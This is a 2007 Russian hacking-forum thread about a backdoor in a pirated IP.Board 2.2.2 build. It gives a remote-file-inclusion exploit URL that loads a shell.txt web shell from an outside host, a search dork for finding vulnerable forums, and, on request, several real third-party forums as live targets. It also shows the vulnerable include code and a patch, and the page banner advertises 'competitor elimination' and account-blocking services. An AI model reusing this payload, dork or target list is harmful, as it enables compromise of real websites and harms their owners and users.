Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

Опции темы

Поиск в этой теме

Опции просмотра

Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

14.07.2007, 05:06

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

С нами: 9963383

Репутация: 140

Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
Как я понял его просто кто-то всунул туда и стал распространять...
В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех)

Код:

http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]

Как вам, а?

𝕏 Twitter Reddit Telegram Копировать ссылку

14.07.2007, 05:13

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,315

С нами: 10248806

Репутация: 2371

Работает не везде...
Просто надо качать нуллы от русского офф.сайта поддержки Ipb

14.07.2007, 13:41

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

С нами: 10533245

Репутация: 773

Не тока в левых Ipb такое есть...

15.07.2007, 01:10

Vallez

Участник форума

Регистрация: 25.12.2005

Сообщений: 151

С нами: 10724459

Репутация: 53

Shram-spb напиши плз форум где работает для теста.

15.07.2007, 01:33

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

С нами: 9963383

Репутация: 140

Код:

http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url]

15.07.2007, 13:22

Vallez

Участник форума

Регистрация: 25.12.2005

Сообщений: 151

С нами: 10724459

Репутация: 53

Не работает сайт можно ешё 1 плз.

15.07.2007, 15:16

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

С нами: 9963383

Репутация: 140

Цитата:

Сообщение от Vallez

Не работает сайт можно ешё 1 плз.

Видимо уже кто-то сломал.. или админы проснулись %)

Вот еще парочка.

Код:

http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]

Код:

http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]

16.07.2007, 17:45

~~a1ex~~

Banned

Регистрация: 11.10.2006

Сообщений: 682

С нами: 10306406

Репутация: 271

Отправить сообщение для a1ex с помощью AIM

Отправить сообщение для a1ex с помощью MSN

Отправить сообщение для a1ex с помощью Yahoo

Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.

16.07.2007, 18:07

GrAmOzEkA

Участник форума

Регистрация: 25.06.2006

Сообщений: 220

С нами: 10461853

Репутация: 178

Написано же

Цитата:

[url ]

вот и подставляй туда свой урл

Вот пример:

Код:

http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php

#10

16.07.2007, 18:07

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

С нами: 9963383

Репутация: 140

Цитата:

Сообщение от a1ex

Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.

Код:

dork: "Русская версия IP.Board 2.2.2 © 2007  IPS, Inc."

exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt

Куда уж подробнее??
Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:

/source/action_public/profile.php
строка 885:

Код:

if ( $chk )
{
         @include ($chk);
         exit();
}

Меняем на:

Код:

if ( $chk )
{
   echo "Fuck you, Spilberg... Fixed by 5hr4M...";
   exit();
}

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
скрипт распознавания форума	genom--	Уязвимости CMS / форумов	22	31.12.2008 15:06
Внимание! Virustotal опасен!	Herevef	Защита ОС: вирусы, антивирусы, файрволы.	12	17.10.2007 12:53
IPB 2.2.2 Nulled	»Atom1c«	PHP	14	11.04.2007 10:10
Laser Squad Nemesis - Русская версия	~!DoK_tOR!~	Болталка	1	11.03.2007 00:24

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход